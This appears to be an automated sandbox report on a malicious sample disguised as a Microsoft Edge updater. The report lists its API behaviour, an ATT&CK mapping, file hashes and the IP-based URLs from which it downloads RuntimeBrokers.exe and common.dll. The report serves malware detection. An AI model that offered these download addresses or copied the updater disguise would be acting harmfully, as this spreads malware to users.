Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: RuntimeBrokers.exe, 00000001.00000002.2954997145.0000000000C47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0044D2F4 rdtsc 1_2_0044D2F4
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016EA6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0016EA6A
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0048621A EnterCriticalSection,SetFilePointer,GetLastError,OutputDebugStringW,WriteFile,LeaveCriticalSection,1_2_0048621A
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0045E100 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_0045E100
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016BA2B mov eax, dword ptr fs:[00000030h]0_2_0016BA2B
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00170268 mov eax, dword ptr fs:[00000030h]0_2_00170268
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004DFB26 mov eax, dword ptr fs:[00000030h]1_2_004DFB26
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016132B GetProcessHeap,__Init_thread_footer,__Init_thread_footer,0_2_0016132B
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00168902 SetUnhandledExceptionFilter,0_2_00168902
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016EA6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0016EA6A
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00168C03 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00168C03
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016876F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0016876F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004AE04B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004AE04B
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004BABCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004BABCA
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe "C:\Users\user\AppData\Roaming\RuntimeBrokers.exe" Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00165EBB SetSecurityDescriptorDacl,0_2_00165EBB
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00168A15 cpuid 0_2_00168A15
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_004F20F5
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: EnumSystemLocalesW,1_2_004E6FB1
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: GetLocaleInfoW,1_2_004AD30E
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: ___crtGetLocaleInfoEx,1_2_004AD407
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_004F179F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: GetLocaleInfoW,1_2_004E7A01
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: EnumSystemLocalesW,1_2_004F1A17
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: EnumSystemLocalesW,1_2_004F1A80
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: EnumSystemLocalesW,1_2_004F1B1B
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004F1F21
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C0EAA53 __EH_prolog3,InitializeCriticalSection,GetCurrentProcessId,GetCurrentThreadId,CreateNamedPipeA,CreateThread,CreateEventA,1_2_6C0EAA53
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016207E FindFirstFileW,GetSystemTimeAsFileTime,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_0016207E
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C15687C ?SetFileAuthority@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z,__EH_prolog3_GS,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,GetUserNameW,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,1_2_6C15687C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_004D8CEE _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_004D8CEE
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_00408D44 GetVersionExW,1_2_00408D44
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C10AC3B __EH_prolog3_GS,_time32,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QBEHXZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QBE_KXZ,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,_wfopen,fwrite,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,_errno,fclose,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,_errno,1_2_6C10AC3B
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C0C6C9C ?from_json@jsonbind@@YAHPAXABVValue@Json@@@Z,1_2_6C0C6C9C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C0C6D1E ?to_json@jsonbind@@YAHPAXAAVValue@Json@@@Z,1_2_6C0C6D1E
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C1365DE ?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z,1_2_6C1365DE

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter		1
DLL Side-Loading		12
Process Injection		2
Masquerading		OS Credential Dumping2
System Time Discovery		Remote Services11
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API		Boot or Logon Initialization Scripts1
DLL Side-Loading		12
Process Injection		LSASS Memory41
Security Software Discovery		Remote Desktop ProtocolData from Removable Media11
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive32
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS11
Account Discovery		Distributed Component Object ModelInput Capture1
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
System Owner/User Discovery		SSHKeylogging21
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem25
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
MicrosoftEdgeUpdateSetup.exe0%VirustotalBrowse
MicrosoftEdgeUpdateSetup.exe0%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RuntimeBrokers[1].exe0%ReversingLabs
C:\Users\user\AppData\Roaming\RuntimeBrokers.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://154.82.68.34:16653/common.dlltrue
    		unknown
    http://154.82.68.34:16653/RuntimeBrokers.exetrue
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://154.82.68.34:16653/common.dllSMicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        http://154.82.68.34:16653/common.dllrMicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          http://154.82.68.34:16653/RuntimeBrokers.exeC:MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            http://154.82.68.34:16653/RuntimeBrokers.exe2jMicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://lol.qq.com/client/client.shtml?uin=%u&area=%u&timestamp=%u&Signature=%sRuntimeBrokers.exe, RuntimeBrokers.exe, 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers.exe, 00000001.00000000.1830246021.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.drfalse
                		high
                http://154.82.68.34/32MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://154.82.68.34:16653/RuntimeBrokers.exeaMicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://154.82.68.34:16653/common.dllFtMicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://154.82.68.34:16653/RuntimeBrokers.exegMicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://154.82.68.34:16653/common.dlldllLMEMPMicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://154.82.68.34/MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://154.82.68.34:16653/common.dllAppDataMicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://154.82.68.34:16653/common.dlloC:MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://curl.haxx.se/docs/http-cookies.htmlRuntimeBrokers.exe, RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.drfalse
                                  		high
                                  http://154.82.68.34:16653/RuntimeBrokers.exe)CeMicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://154.82.68.34:16653/common.dllSSC:MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828404553.0000000002C4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      134.122.134.93
                                      		unknownUnited States
                                      		64050BCPL-SGBGPNETGlobalASNSGfalse
                                      154.82.68.34
                                      		unknownSeychelles
                                      		32708ROOTNETWORKSUStrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1579412
                                      Start date and time:2024-12-22 08:36:06 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 55s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:6
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:MicrosoftEdgeUpdateSetup.exe
                                      Detection:MAL
                                      Classification:mal60.troj.evad.winEXE@3/4@0/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 96%
                                      • Number of executed functions: 30
                                      • Number of non-executed functions: 384
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size exceeded maximum capacity and may have missing network information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ROOTNETWORKSUSnshkarm5.elfGet hashmaliciousMiraiBrowse
                                      • 154.94.148.181
                                      x86.elfGet hashmaliciousUnknownBrowse
                                      • 154.82.151.143
                                      bot.x86.elfGet hashmaliciousMiraiBrowse
                                      • 38.145.246.125
                                      nsharm7.elfGet hashmaliciousMiraiBrowse
                                      • 156.236.225.1
                                      akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                      • 154.94.130.206
                                      jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                      • 154.82.254.162
                                      maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                      • 154.82.100.177
                                      nabx86.elfGet hashmaliciousUnknownBrowse
                                      • 154.82.157.214
                                      iwir64.elfGet hashmaliciousMiraiBrowse
                                      • 154.82.103.244
                                      yakuza.mips.elfGet hashmaliciousUnknownBrowse
                                      • 154.27.246.207
                                      BCPL-SGBGPNETGlobalASNSGSWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                      • 134.122.191.187
                                      http://93287.mobiGet hashmaliciousUnknownBrowse
                                      • 137.220.229.108
                                      T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                      • 118.107.29.172
                                      oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                      • 118.107.29.172
                                      T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                      • 118.107.29.172
                                      oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                      • 118.107.29.172
                                      7nJ9Jo78Vq.dllGet hashmaliciousUnknownBrowse
                                      • 118.107.29.172
                                      VJQyKuHEUe.exeGet hashmaliciousUnknownBrowse
                                      • 27.50.63.8
                                      7nJ9Jo78Vq.dllGet hashmaliciousUnknownBrowse
                                      • 118.107.29.172
                                      nrGkqbCyKP.exeGet hashmaliciousUnknownBrowse
                                      • 27.50.63.8

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RuntimeBrokers[1].exe

                                      Download File
                                      Process:C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1770080
                                      Entropy (8bit):6.3128254526480045
                                      Encrypted:false
                                      SSDEEP:24576:oPXhNTSxm9xCr5xFjftqgpIiS8u9LmXI6vPz3zTSucLNDiO8emB2qFmpiIQyKn1o:o/oBftWLmXIAPz36vNDi5BFmpiIQyKny
                                      MD5:70E1B494A6097723A9B8BBE2CF41CF0A
                                      SHA1:76FEFADE0BB0D33F173487779BBB5F673BFF56C3
                                      SHA-256:77740C290D9802B6966CB52AE984B13F6D55739BC6778E6D6A8564CB063F5C29
                                      SHA-512:949AD643751B733A67C8AB091F738EFBCF6875409175CC377B3D7E8B03A2E55568EB1C19E6FF7D1D53397CCE69B80E7D923C016783A182950B8DF921CD86D168
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:low
                                      Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$....................}.g....}.e.t...}.d......<..................W7Q................................j......j...................j.....j.i..........j......Rich...................PE..L...1.Nf.....................^....................@..........................P......!%........-.............................$I..........................`(..............T...........................8...@...............@............................text...L........................... ..`.rdata..............................@..@.data..../...p.......R..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\common[1].dll

                                      Download File
                                      Process:C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3925088
                                      Entropy (8bit):6.767280363456254
                                      Encrypted:false
                                      SSDEEP:49152:TTcKPhmbTTBpHO0e9iNImYz88p4wi1ZxpEvHYyAadSPEssLT3hrxcMQyKJgW8i2P:TvGFpHM9iNITzLteZSHnpfssprx/Co
                                      MD5:FAD86474CD9720226AA41F9117FA1C32
                                      SHA1:89C995FAEF96B2EEC50BBFFF2D1749379DE829D4
                                      SHA-256:492C3445EDDADC4B2C411A6EB79813339A0B3FC6D2D69A0F7B0E6CFA8E6ACED1
                                      SHA-512:3334A5F68CF6E60668B4BFA9599F5B054EB6166160CB87C8CB75B50C0810DB472F3EA97076085BE0338ED1C40704CC806BDE56166D1A1796DC2A80BEA3D49D8A
                                      Malicious:false
                                      Reputation:low
                                      Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$.......A.G...)...)...)...-...).j.....).o.-...).o.,...)..v....).W.-...).W.*...).W.,.'.).W.(...).......)...,.Q.)...!...).....:.)...(.W.)...-...)...,.g.)...)...).......)......)...+...).Rich..).........................PE..L.....Nf...........!......)..d.......E........)..............................`<.......;...@.`.........................6..v...7.......:...............;.`(... :..1....2.T.....................2.......2.@.............)..............................text....).......)................. ..`.rdata...2....)..4....).............@..@.data...0.....8..v....7.............@....QMGuid.......9......l9.............@....rsrc.........:......n9.............@..@.reloc...1... :..2....9.............@..B................................................................................................................................................................................

                                      C:\Users\user\AppData\Roaming\RuntimeBrokers.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1770080
                                      Entropy (8bit):6.3128254526480045
                                      Encrypted:false
                                      SSDEEP:24576:oPXhNTSxm9xCr5xFjftqgpIiS8u9LmXI6vPz3zTSucLNDiO8emB2qFmpiIQyKn1o:o/oBftWLmXIAPz36vNDi5BFmpiIQyKny
                                      MD5:70E1B494A6097723A9B8BBE2CF41CF0A
                                      SHA1:76FEFADE0BB0D33F173487779BBB5F673BFF56C3
                                      SHA-256:77740C290D9802B6966CB52AE984B13F6D55739BC6778E6D6A8564CB063F5C29
                                      SHA-512:949AD643751B733A67C8AB091F738EFBCF6875409175CC377B3D7E8B03A2E55568EB1C19E6FF7D1D53397CCE69B80E7D923C016783A182950B8DF921CD86D168
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:low
                                      Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$....................}.g....}.e.t...}.d......<..................W7Q................................j......j...................j.....j.i..........j......Rich...................PE..L...1.Nf.....................^....................@..........................P......!%........-.............................$I..........................`(..............T...........................8...@...............@............................text...L........................... ..`.rdata..............................@..@.data..../...p.......R..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Roaming\common.dll

                                      Download File
                                      Process:C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3925088
                                      Entropy (8bit):6.767280363456254
                                      Encrypted:false
                                      SSDEEP:49152:TTcKPhmbTTBpHO0e9iNImYz88p4wi1ZxpEvHYyAadSPEssLT3hrxcMQyKJgW8i2P:TvGFpHM9iNITzLteZSHnpfssprx/Co
                                      MD5:FAD86474CD9720226AA41F9117FA1C32
                                      SHA1:89C995FAEF96B2EEC50BBFFF2D1749379DE829D4
                                      SHA-256:492C3445EDDADC4B2C411A6EB79813339A0B3FC6D2D69A0F7B0E6CFA8E6ACED1
                                      SHA-512:3334A5F68CF6E60668B4BFA9599F5B054EB6166160CB87C8CB75B50C0810DB472F3EA97076085BE0338ED1C40704CC806BDE56166D1A1796DC2A80BEA3D49D8A
                                      Malicious:false
                                      Reputation:low
                                      Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$.......A.G...)...)...)...-...).j.....).o.-...).o.,...)..v....).W.-...).W.*...).W.,.'.).W.(...).......)...,.Q.)...!...).....:.)...(.W.)...-...)...,.g.)...)...).......)......)...+...).Rich..).........................PE..L.....Nf...........!......)..d.......E........)..............................`<.......;...@.`.........................6..v...7.......:...............;.`(... :..1....2.T.....................2.......2.@.............)..............................text....).......)................. ..`.rdata...2....)..4....).............@..@.data...0.....8..v....7.............@....QMGuid.......9......l9.............@....rsrc.........:......n9.............@..@.reloc...1... :..2....9.............@..B................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.9296610143602315
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:MicrosoftEdgeUpdateSetup.exe
                                      File size:1'634'896 bytes
